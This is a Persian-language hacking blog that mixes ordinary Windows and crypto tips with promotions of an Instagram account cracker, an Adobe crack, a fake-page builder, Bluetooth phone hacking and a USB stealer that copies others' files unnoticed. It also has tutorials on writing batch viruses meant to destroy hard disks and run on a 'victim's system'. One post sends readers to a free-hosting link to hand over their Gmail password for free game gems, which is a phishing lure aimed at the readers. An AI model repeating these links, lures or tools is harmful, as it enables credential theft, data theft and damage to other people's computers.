loading...
دایره هک
DR.KILLER بازدید : 365 یکشنبه 02 خرداد 1395 نظرات (0)

با سلام

این وبلاگ صرفا جهت آموزش ساخته شده و مدیران وبلاگ به هیچ وجه مسئولیتی در قبال استفاده نادرست از  مطالب ندارد

 

هرگونه کپی برداری از مطالب بدون ذکر منبع کاملا غیرقانونی میباشد و پیگردقانونی خواهد داشت

 

این وبلاگ کاملا خصوصی بوده و توسط هیچ شرکت یا گروهی ساخته نشده

 

تمامی مطالب وبلاگ توسط مدیران وبلاگ *دایره هک* تست شده

 

با تشکر مدیریت وبلاگ:▓▒░DR.KILLER░▒▓ 

 

 

 

DR.KILLER بازدید : 368 یکشنبه 04 آذر 1397 نظرات (1)

بدون شک پایتون یکی از قدرتمند ترین زبان های برنامه نویسی حال حاضر هست که میشه در ضمینه های مختلفی به کار برد . 

در این پست قصد داریم تا کتاب بازی سازی با پایتون رو براتون به اشتراک بزاریم که شک نکنید اگه به بازی سازی علاقه دارید این کتاب برای شروع کار شما مناسب خواهد بود . 

 

 

 

لینک دانلود : دانلود از پیکوفایل 

DR.KILLER بازدید : 989 یکشنبه 04 آذر 1397 نظرات (0)

اینبار با پستی برای دوستان کرکر اینستاگرام در خدمت شما هستیم که توسط گروه روسی برای چک کردن یوزر لیست طولانی برای کرک اکانت های اینستاگرامی ساخته شده و مهم ترین ویژگی این نرم افزار سادگی و سرعت باور نکردنی در چک کردن یوزر ها و فرایند جداسازی آنها می باشد که میتوانید رایگان در وبگاه دایره ی هک دانلود نمایید . 

 

 

لینک دانلود : دانلود از پیکوفایل 

 

DR.KILLER بازدید : 308 یکشنبه 04 آذر 1397 نظرات (0)

امروز با ترینر جدید و فوق العاده بازی کال آف دیوتی 4 خدمت شما عزیزان اومدیم که بنابر گفته ی سازندگان و شایعات ، روی نسخه ی آنلاین هم کار میکنه !! پس اگه از ترفدار های این بازی هستید . پیشنهاد میکنیم این ترینر رو از دست ندید . 

از بقیه ی پست های وب هم دیدن نمایید/

 

 

لینک دانلود : دانلود از پیکو فایل 

DR.KILLER بازدید : 293 شنبه 03 آذر 1397 نظرات (0)

بعد از معرفی ارز های  دیجیتا قصد داریم تا شما رو با کیف پول های دیجیتال و میزان امنیت هر یک بررسی کنیم ...

این مقاله توسط تیم دایره ی هک برای استفاده ی شما عزیزان گرد آوری شذه که میتوانید دانلود کنید .

 

 

دانلود از پیکوفایل : دانلود مقاله 

DR.KILLER بازدید : 299 شنبه 03 آذر 1397 نظرات (0)

دوستان عزیز برگشتیم با موضوع داغ بیت کوین که این روز ها سر و صدای زیادی به پا کرده و شاید شما هم از اون دسته از عزیزانی باشید که بخواین با بیت کوین آشنا بشید . 

تیم ما مقاله ی پایه و در حد آشنایی با بیت کوین براتون تنظیم کرده که میتونید دانلود و استفاده کنید. با سپاس 

 

 

لینک دانلود : دانلود با لینک مستقیم

DR.KILLER بازدید : 304 دوشنبه 28 آبان 1397 نظرات (0)

وقتی به یک سیستم بلاکچین نگاه می‌کنیم، تفاوت زیادی با سیستم‌هایی که قبلا با آنها برخورد داشته‌ایم ندارد، مثلا ویکی پدیا.
در یک بلاکچین افراد زیادی می‌توانند ورودی‌های زیادی از رکورد‌های اطلاعاتی را بنویسند و اجتماعی از افراد می‌توانند تعیین کنند که این رکورد‌ها چگونه اصلاح و به روزرسانی شود. همچنین در ویکی پدیا، ورودی‌ها به وسیله یک نویسنده تولید نمی‌شود و بیش از یک نفر در این پروسه دخیل هستند.
اگر کمی سطحی‌تر صحبت کنیم، تفاوت‌هایی که بلاکچین را متمایز می‌کند شفاف‌تر خواهد شد. در حالی که هر دو(بلاکچین و ویکی پدیا) بر روی شبکه گسترده یا اینترنت کار می‌کنند، ویکی پدیا در شبکه جهانی وب و در مدل کلاینت-سرور فعالیت می‌کند.
کاربری (کلاینتی) با اجازه دسترسی که به حسابش داده شده است قادر خواهد بود تا تغییراتی را در ورودی‌های ویکی‌پدیا که در یک سرور مرکزی قرار دارد اعمال کند.

هرگاه یک کاربر به صفحه‌ی ویکی‌پدیا دسترسی پیدا کند، یک نسخه آپدیت شده از نسخه مرجع یک ورودی ویکی‌پدیا در اختیارش قرار خواهد گرفت. نظارت بر پایگاه‌ داده بر عهده مدیرهای ویکی‌پدیا خواهد بود که وظیفه تعیین دسترسی و اجازه عملیات مختلف را دارند و به وسیله مرجع خاصی نگه‌داری و بررسی می‌شود.

در نتیجه سیستمی خواهیم داشت که بدون نیاز به شخص ثالث و مستقل کار خواهد کرد. عمل تامین امنیت روابط دیجیتال به عهده سیستم ساده، زیبا و توانمند شبکه‌ی بلاکچین گذاشته شده است.
معنی اعتماد دیجیتال
اعتماد قضاوت کردن بر اساس ریسک موجود بین دو طرف است و در دنیای دیجیتال اعتماد سازی معمولا به “ثابت کردن هویت” و “ثابت کردن اجازه دسترسی” شناخته می‌شود.
اگر بخواهیم ساده‌تر توضیح بدهیم، ما می‌خواهیم بدانیم، “آیا شما کسی که می‌گویید هستید یا نه؟” و “آیا شما قادر به انجام کاری که ادعا می‌کنید در شبکه را دارید؟”
در تکنولوژی بلاکچین، رمزنویسی کلید اختصاصی به عنوان ابزار قدرتمند برای بر آورده کردن نیاز‌هایی از جمله تصدیق مالکیت شناخته می‌شود. داشتن یک کلید اختصاصی باعث عدم لزوم برای به اشتراک ‌گذاری اطلاعات شخصی فرد برای انجام معاملات و در نتیجه در امان ماندن این اطلاعات از دست هکر ها می‌شود. تصدیق موارد به تنهایی کافی نیست. اجازه کار، داشتن پول کافی، و مخابره کردن تراکنش درست و مورد تایید و . . . همه نیاز به یک شبکه توزیع شده وهمتا به همتا برای شروع دارد. شبکه توزیع شده ریسک خرابی‌هایی که در شبکه مرکزی وجود دارد را برطرف می‌کند.

این شبکه باید به ثبت رکورد ها و امنیت اختصاص یابد. صدور اجازه تراکنش‌ها نتیجه کل شبکه‌ای است که قوانین از پیش طراحی شده (پروتکل بلاکچین) را اجرا می‌کند. احراز هویت و اجازه‌های دسترسی ای که به این وسیله انجام می‌شود باعث از بین رفتن پروسه‌ها و ابزار‌های گران قیمت و زمان بر و در عوض بر پایه اعتماد به شبکه انجام می‌شود. پیشتازان در صنایع مختلف در سراسر جهان توجه‌شان به دستاورد های استفاده از این تکنولوژی جذب شده است. از تکنولوژی بلاکچین معمولا به عنوان ستون فقرا ت لایه‌ی تراکنش‌های اینترنت و “بنیاد ارزش اینترنتی” یاد می‌شود.

در واقع، ایده رمز گزاری کلید‌های شخصی و دفتر‌کل همگانی می‌تواند به کاربران انگیزه دهد تا عملیات‌های روابط دیجیتال از جمله ارسال ارز دیجیتال به دیگر افراد را مرسوم‌تر و امن‌تر کنند. بسیاری از افراد در دولت‌ها، شرکت‌های IT و بانک‌ها در تلاش هستند تا برای خود این لایه از تراکنش‌ها را به وجود آورند تا در آینده بتوانند از آن استفاده کنند.

این ایده می‌تواند در همه سیستم‌های ثبتی که نیاز به اعتماد دارد اجرا شود.

 

DR.KILLER بازدید : 323 چهارشنبه 23 فروردین 1396 نظرات (0)

دوستان عزیز سلام . ضمن تبریک سال نو با یه آموزش مقدماتی در رابطه با برنامه نویسی و مفاهیم الیه آن خدمت رسیدیم که امیدواریم بتونیم مثل قبل رضایت شما رو جلب کنیم.

 

 

دانلود در ادامه مطلب...

DR.KILLER بازدید : 181 سه شنبه 24 اسفند 1395 نظرات (0)
DR.KILLER بازدید : 171 پنجشنبه 19 اسفند 1395 نظرات (0)

شاید برای شما هم پیش اومده باشه که بخواین قبل از اسکن کردن فلش یا سی دی و ... اجرای خودکار شروع به کار نکنه و فلش و... به صورت اتوماتیک باز نشه برای جلوگیری از اجرای خودکار یا غیر فعال کردن autoplayویندوز باید طبق دستورات زیر عمل کنید .

 

اتوپلی*نکته: از مزایای این کار جلوگیری از وارد شدن ویروس به سیستم شما هست که پیشنهاد میکنیم حتما و حتما غیر فعال کنید .

DR.KILLER بازدید : 391 چهارشنبه 18 اسفند 1395 نظرات (0)

چند وقتی از معرفی رایگان ربات کلش آف کلنز در سایت میگذره و تصمیم گرفتیم استراتژی اتکی رو معرفی کنیم که کار شما رو چندین برابر راحت (تر!)

میکنه. اگه از کاربرای ربات باشید میدونید که بعضی وقتا ربات جاهایی که باید لوت زیادی بزنه به دلیل ربات بودنش نمیتونه اونطور که باید اتک بزنه و لوت کمی میزنه و در نتیجه در زمان زیادی منابع شما فول میشه.

 

شما عزیزان تنها کاری که باید بکنید برای اجرای ربات اینه که اسکریپ مربوط خودتونرو که مربوط به تعداد نفرات کمپ شماست به پوشه SCVدر پوشه ربات و پوشه ATTACKکپی کنید . میبینید که خود ربات هم اسکریپ های پیشنهادیش اونجا هستند که میشه از اونا هم استفاده کرد

اما اسکریپت اتک ما از معروف ترین اسکریپ های ربات هست که باجیانت و والبریکر و بارچ اتک میزنه و نتایج فوق العاده ای داره .برای فعال سازی اسکریپ تو ربات به بخش ATTACK PLAN  و  SEARCH & ATTACK برید و اونجا به قسمت ATTACKبرید و تو صفحه باز شده در منو سمت چپ که اسمشATTACK WITHهست در منوی اولش گزینه دومش رو که سکریپ اتک هست رو انتخاب کنید و در سمت چپ در منوی اول اسکریپی که کپی کردید رو انتخاب کنید و تمام !!!

 

واسه دانلودش به ادامه ی مطلب برید...

DR.KILLER بازدید : 199 سه شنبه 17 اسفند 1395 نظرات (0)

دوستای عزیز گیمر وب سلام!!

امروز براتون یه مپ عالی و بزرگ برای بازی کانتر استریک 1.6 آماده کردیم که ساعت ها بتونید خودتونو باهاش سرگرم کنید(!!)

کانتر استریک

 

 

 

فقط کافیه فایل هارو بعد اکسترکت کپی کنی تو پوشه ی mapsبازی و برید تو بازی و تو قسمت انتخاب مپ حالشو ببرید (!!!)

لینک دانلودشم همینجا میزارم که نرید الکی ادامه ی مطلب :-)

 

لینک دانلود: دانلود از سرور پیکوفایل

DR.KILLER بازدید : 156 سه شنبه 17 اسفند 1395 نظرات (0)
سلام دوستای عزیز امروز براتون کرک محصولات شرکت Adobeرو آماده کردیم که باهاش میتونید همه {همه} ی محصولاتش رو کرک کنید . 
همه محصولات مانند فتوشاپ یا پی دی اف و ... که معمولا خیلی از ما ازشون استفاده میکنیم و اکثرا به فعال سازی نیاز دارن و از اونجایی که ما ایرانی ها عادت به خرید نداریم :-)  براتون کرک همه محصولات رو یه جا و با یه نرم افزار آماده کردیم .
 
 
 
دانلود و آموزش در ادامه ی مطلب...
DR.KILLER بازدید : 399 دوشنبه 16 اسفند 1395 نظرات (0)

سلام دوستای عزیز !!!

امروز براتون یه آموزش پیدا کردم که خیلی آسون میتونین ویروس نویسی کنین اونم با نت پد خود ویندوز !!!

 

خیلی آسون و راحت و با آموزش قدم به قدم ..

با اینکه تو پست های قبلی این آموزش هارو گذاشته بودیم اما این یکی یه چیز دیگست 

اینم لینک سایتش  با تشکر از سایت 

اوبونتو-ایران

لینک :

صفحه  وبلاگ آموزش ویروس نویسی

مشغول تلفن

DR.KILLER بازدید : 259 جمعه 13 اسفند 1395 نظرات (0)

سلام به همراهان همیشگی دایره هک

 

امروز میخوام روش آنلاین کردن بازی کانتر استریک 1.6 رو که از معروف ترین بازی های سرور دنیا هست رو بهتون یاد بدم تا به راحتی آنلاین بازی کنید  و مهارت خودتونو با اونا بسنجید.

خب برای شروع شما به موارد زیر نیاز دارید:

  • کانتر استریک 1.6
  • پچ کانتر استریک
  • آنتی چیت
خب برای اولین مرحله شما باید بازی رو نصب کنید یا سی دی مربوط رو تهیه بکنید. برای احتی لینک دانلود را براتون میذارم
 
 مرحله ی دوم نصب پچ بازی هست که با اینکه پچ های زیادی برای بازی ارائه شده اما پیشنهاد ما پچ زیر هست که براتون لینکشو میزاریم:
 
پچ رو دقیقا در پوشه بازی بریزید مثلا اگه توی c:programfiles : vaveنصب شده پچ رو تو پوشه vaveنصب کنید.
مرحله بعدی نصب آنتی چیت Sxe-Injected هست که خیلی از سرور های بازی این آنتی چیت رو لازم دارن که میتونید اونو از لینک زیر دانلود کنید
نکته:لازم نیست تو محل بازی نصب کنید.
بعد نصب سیستم خودتونو restartکنید و آنتی چیت رو باز کنید و Minimize کنید ولی ازش خارج نشید . حالا روی بازی کلیک کنید و وارد کانتر بشید گزینه بعد تو Find Server و در بخش Favorites و گزینه ی Add Server رو بزنید و آی پی سرور رو وارد کنید و روی سرور کلیک کنید تا وارد سرور بشید. 
پایان
هر سوالی که داشتید رو تو قسمت نظات برامون ارسال کنید تا سریعا جواب داده بشه . سپاس
 
 
DR.KILLER بازدید : 167 جمعه 10 دی 1395 نظرات (0)

سلام دوستان یه سایتی هست که جم رایگان میده در مدت 48 ساعت بسته جم 400هزتر تومانی رو براتون میخره و واریز میکنه کافیه برین و رمز و جیمیلتون رو بدین تا به صورت خودکار براتون جم واریز بشه.

https://free12.000webhostapp.com/index.php


عجله کنین تا سوپرسل نفهمیده. رو ی لینک کلیک کنید.

DR.KILLER بازدید : 162 شنبه 15 آبان 1395 نظرات (0)

هنگامی که فایلی را در محیط ویندوز حذف می‌کنید، این فایل راهی Recycle Bin یا سطل آشغال ویندوز می‌شود و نهایتآً با خالی کردن سطل آشغال، فایل به طور کامل حذف می‌گردد. اگر فراموش می‌کنید که سطل آشغال ویندوز را به طور مداوم خالی کنید با استفاده این ترفند می‌توانید طوری برنامه‌ریزی کنید که در زمان‌های معین محتویات Recycle Bin به طور خودکار حذف شوند.

 

برای این کار ابتدا در منوی Start عبارت Task Scheduler را تایپ نمایید و در لیست نتایج بر روی Task Scheduler کلیک کنید.

 

منبع:سایت ترفندستان

بقیه در ادامه ی مطلب...

DR.KILLER بازدید : 153 جمعه 30 مهر 1395 نظرات (0)

در این پست شما با کدها و دستورات  Command Prompt آشنا میشوید و البته نه همه دستورات , در این پست فقط ۹۰ دستور ذکر شده که بخش بسیار کوچکی از دستورات CMD هستند ..
 
خط فرمان در سیستم عامل‌های مانند ویندوز ، لینوکس و… بصورت یک نرم افزار ارائه می‌شود که Command Prompt نام دارد.
برای وارد شدن به  CMD در ویندوز از منو استارت وارد RuN شوید و عبارت Cmd را تایپ کنید و اینتر بزنید ..





۱٫ دستور ASSOC
برای تغییر و نشان دادن اینکه چه فایلی با چه برنامه ای باز شود. (در ویندوز ۷ ممکن است به درستی جواب ندهد)

کد:
ASSOC.txt=textfile


 
۲٫ دستور ATTRIB


برای نشان دادن وضعیت فایل ها از جمله مخفی بودن و یا سیستمی و فقط خواندنی و…
برای از حالت در آوردن ، در کنار پارامتر حرف – را وارد کنید و برای به حالت در آوردن ، از حرف + استفاده کنید.

کد:
ATTRIB –R –H –S C:\boot.ini

 

 
۳٫ دستور BREAK
برای شکست خط است.

کد:
BREAK


۴٫ دستور BCDEDIT
برای ویرایش فایل بوت و نشان دادن مکان فایلی که رایانه را روشن می کند.

کد:
BCDEDIT

 

بقیه در ادامه مطلب...

 

منبع:سایت بدباز

DR.KILLER بازدید : 153 جمعه 30 مهر 1395 نظرات (0)

 

آیا این امکان وجود دارد که بتوان از یک نوشته عکس گرفت یا آن را اسکن کرد و سپس آن را به صورت متن تحویل گرفت؟ پاسخ این سوال مثبت است، حتی اگر متن شما فارسی باشد! برای این کار نیازی به نرم‌افزارهای گران‌قیمت نیز نیست، بلکه با استفاده از اپلیکیشن تلگرام می‌توانید این کار را انجام دهید و متون فارسی را به آسانی، با سرعت بالا و به طور رایگان از تصاویر استخراج کنید. در این ترفند به نحوه‌ی انجام این کار می‌پردازیم.

 

این کار که فناوری OCR نام دارد تاریخچه‌ای طولانی دارد. در خصوص متون انگلیسی این کار از مدت‌ها پیش شدنی بود. اما در خصوص متون فارسی، از چند سال گذشته تلاش‌های مختلفی در این زمینه انجام شده است. یکی از آسان‌ترین راه‌ها برای انجام این کار استفاده از یک ربات تلگرام است که برای این کار توسعه داده شده است و در ادامه به معرفی نحوه‌ی کار با آن خواهیم پرداخت.

 

این کار از طریق رباتی به نام OCR انجام می‌گیرد. برای دسترسی به این ربات، عبارت زیر را در محیط چت با خودتان یا دوست‌تان و یا حتی یکی از گروه‌ها، ارسال نمایید:

@iocrbot

اکنون لینک آن را لمس نمایید.

 

یا این که در مرورگر اینترنتی خود وارد لینک زیر شوید:

https://telegram.me/iocrbot

پس از باز شدن صفحه در مرورگر، به طور خودکار اپلیکیشن تلگرام باز شده و صفحه‌ی مربوط به ربات نمایان می‌شود.

اکنون دکمه‌ی Start را انتخاب کنید تا ربات راه‌اندازی شود.

 

 

 

بقیه در ادامه مطلب...

 

منبع:سایت ترفندستان

DR.KILLER بازدید : 147 جمعه 30 مهر 1395 نظرات (0)

 

احتمالاً شما نیز به‌مانند بسیاری از کاربران تنها زمانی که برنامه‌ای هنگ می‌کند به Task Manager ویندوز پناه می‌برید. اما بایستی بدانید عملکرد تسک منیجر تنها به بستن برنامه‌های هنگ‌کرده محدود نمی‌شود، بلکه توانایی‌های عمیقی در آن نهفته شده است که شما را شگفت‌زده می‌کند. به ویژه در تسک منیجر ویندوز 10 که عملکرد آن بسیار حرفه‌ای‌تر نیز شده است. هم‌اکنون به معرفی این 10 نکته‌ می‌پردازیم که کم‌تر کاربری از آن‌ها باخبر است.

 

ترفند ها در ادامه مطلب....

 

منبع:سایت ترفندستان

DR.KILLER بازدید : 153 جمعه 30 مهر 1395 نظرات (0)

 

فعال سازی پوسته سیاه در ویندوز 10Reviewed by thito on Aug 3Rating: 5.0فعال سازی پوسته سیاه در ویندوز 10اگر شما هم مانند من از طرفداران پوسته ی سیاه ویندوز 10 هستید، از فایل های رجیستری زیر که برای راحتی کار شما آماده شده اند استفاده بفرمایید در غیر این صورت باید تنظیمات رجیستری ویندوز رو تغییر بدید که به دلیل پیچیده و زمان بر بودن آن توصیه نمیشه.

اگر شما هم مانند من از طرفداران پوسته ی سیاه ویندوز 10 هستید، از فایل های رجیستری زیر که برای راحتی کار شما آماده شده اند استفاده بفرمایید

در غیر این صورت باید تنظیمات رجیستری ویندوز رو تغییر بدید که به دلیل پیچیده و زمان بر بودن آن توصیه نمیشه.

 

راهنما :

ابتدا فایل دانلود شده ا از حالت فشرده خارج نمایید

برای فعال سازی پوسته ی تیره ی (Dark) ویندوز 10 روی فایل Make Windows 10 Use Dark Theme.reg دوبار کلیک کرده و تمامی پنجره های باز شده را تایید نمایید.

برای بازگشت به حالت قبل و یا فعال سازی پوسته ی روشن ویندوز 10 روی فایل Make Windows 10 Use Light Theme.reg دوبار کلیک کرده و تمامی پنجره های باز شده را تایید نمایید.

 

منبع: سایت کرک باز

DR.KILLER بازدید : 155 سه شنبه 27 مهر 1395 نظرات (0)

با سلام

 

دوستان بعد مدت نه چندان کم!!!{ببخشید خیلی کار داشتیم}برگشتیم و با قدرت به آموزش هک و ترفند هامون ادامه میدیم منتظر خبر ها و پست های جذاب ما باشید.شیطان

 

#از این به بعد مطلب آموزشی بیشتری قرار میدیم.

DR.KILLER بازدید : 139 پنجشنبه 06 خرداد 1395 نظرات (0)

خب دوستان این خط کد رو در NOTEPAD وارد کنید روی هر درایویش که ویندوز نصب باشه خودش میفهمه اجراش میکنه ، بازم میگم اگر خواستید اجرا کنید روی سیستم مجازی اجراش کنید .

از این دستور برای پنهان کردن درایو های ویندوز نیز استفاده میشه .

 

تنها میتوانید آن را با فرمت bat. سیو کرده و بر روی سیستم قربانی اجرا کنید

 

کد در ادامه مطلب...

DR.KILLER بازدید : 171 سه شنبه 04 خرداد 1395 نظرات (0)

این ویروس

 قادر به تخريب کل هارد شما ميباشد.اين
ويروس تحت فرامين داس نوشته شده وهيچ انتي ويروسي قادر به شناسايي اين
ويروس نميباشد.فقط يک انتي داره اونم اف ديسک کردم ولي همين نمونه همبسيار
خطر ناک بوده وقادر به الوده کردن کل فضاي هاردديسک ميباشد.براي کمبايل اين
ويروس ابتدا يک فايل متني مثل نت بد باز کرده وکدهاي زير را نوشته وبعد با
پسوند{بت} سيو کنيد.براي مثال:

 

hacker.bat...

ادامه آموزش در ادامه مطلب...

DR.KILLER بازدید : 156 سه شنبه 04 خرداد 1395 نظرات (0)

این ویروس کاری میکند که کاربر هرگاه دکمه ای از کیبرد را فشار دهد یک صدای بوق که به آن اصطلاحا Beep گفته مشود از کامپیوتر شنیده میشود و هم زمان با این صدا صفحه مانیتور یکبار بطور سریع چشمک میزند.و با این وضع عملا کار با کیبورد امکاپذیر نیست.در ضمن طریقه غیرفعال کردن این ویروس رو نوشتمو
این ویروس از آن دسته است که به کمک رجیستری کار میکند
خب حالا میرسیم به شروع کار

 

بقیه در ادامه مطلب...

DR.KILLER بازدید : 162 سه شنبه 04 خرداد 1395 نظرات (0)

سلام و درود

دوستان عزیز از امروز تیم «دایره هک»براتون ساخت ویروس رو یاد میده

امیدواریم مطالب تا به اینجا براتون مفید بوده باشه.

از امروز ساخت ویروس های ساده و پیشرفته رو بهتون یاد میدیم و امیدواریم که خوشتون بیاد.

 

با تشکر از همراهی شما 

▓▒░DR.KILLER░▒▓ 

DR.KILLER بازدید : 181 سه شنبه 04 خرداد 1395 نظرات (0)

 

تاحالا شده به فکر ساخت فیک پیج از گوگل و(...)باشید و نتونید به خوبی فیک پیجتونو بسازین؟

حالا دیگه تیم دایره هک این کاررو براتون آسون کرده.چطوری؟ اینبار با نرم افزار ساخت فیک پیج . به صورت خیلی خیلی آسون و مبتدی.

 

 

دانلود در ادامه مطلب...

 

 

====>نظر یادتون نره<====

DR.KILLER بازدید : 151 دوشنبه 03 خرداد 1395 نظرات (0)

یه نرم افزار عالی برای عکاسی از شرکت(غول)گوگل برای کاربران اندروید.

توضیح و بررسی برنامه:

این اپلیکیشن همانند سایر اپلیکیشن های اندرویدی شرکت گوگل کاملا رایگان است به همین دلیل این برنامه به سرعت در بین کاربران مختلف دنیا گسترش یافته است. خیلی از نرم افزار های مشابه گوگل کمرا که بصورت آنی تغیراتی را برروی عکس ها ایجاد می کند کیفیت تصویر نهایی را کاهش می دهند که خوشبختانه این موضوع در رابطه با برنامه گوگل صدق نمی کند. از دیگر ویژگی های این برنامه این است که می تواند عکس های جالبی را بیاندازد که در آن چهر شما از مرکز و وسط تصویر برجسته و در کناره ها کشیده و تار است که به نوبه ی خود خیلی خیلی جالب است، یکی دیگر از ویژگی های آن قابلیت تصاویر برداری پانوراما با کیفیتی بینظیر است.

 

دانلود با لینک مستقیم در ادامه مطلب....

DR.KILLER بازدید : 161 دوشنبه 03 خرداد 1395 نظرات (0)

سلام به یاران دایره هک

امروز میخوایم نحوه هک کردن موبایل با بلوتوث رو یادتون بدیم اونم با 7تا عکس..... چطوری؟ به ادامه مطلب برین و فایل اموزش رو دانلود کنید و از هکر بودن لذت ببرید.

DR.KILLER بازدید : 555 دوشنبه 03 خرداد 1395 نظرات (0)


usb stealer3.5.0

یه برنامه کاربردی برای دوستان با این برنامه میتونین تمامی فایل ها و پوشه های موجود در فلش رو بدون اینکه کسی متوجه بشه در هارد دیسک خودتون کپی کنین فقط کافیه برنامه رو باز کنین و فلش رو در کامپیوترتون وصل کنین.

دانلود در ادامه مطلب...

تعداد صفحات : 2

درباره ما
باسلام این وبلاگ رو من و دوستانم برای آموزش هک و ترفند ساختیم و سعی میکنیم"تاحد امکان"مطلب بروز قرار بدیم با تشکرDR.KILLER
اطلاعات کاربری
  • فراموشی رمز عبور؟
  • نظرسنجی
    آیا از وبلاگ ما راضی هستید؟
    آمار سایت
  • کل مطالب : 42
  • کل نظرات : 3
  • افراد آنلاین : 1
  • تعداد اعضا : 2
  • آی پی امروز : 13
  • آی پی دیروز : 17
  • بازدید امروز : 32
  • باردید دیروز : 35
  • گوگل امروز : 0
  • گوگل دیروز : 5
  • بازدید هفته : 260
  • بازدید ماه : 620
  • بازدید سال : 9,437
  • بازدید کلی : 45,801
  • کدهای اختصاصی
    Instagram

    مترجم سایت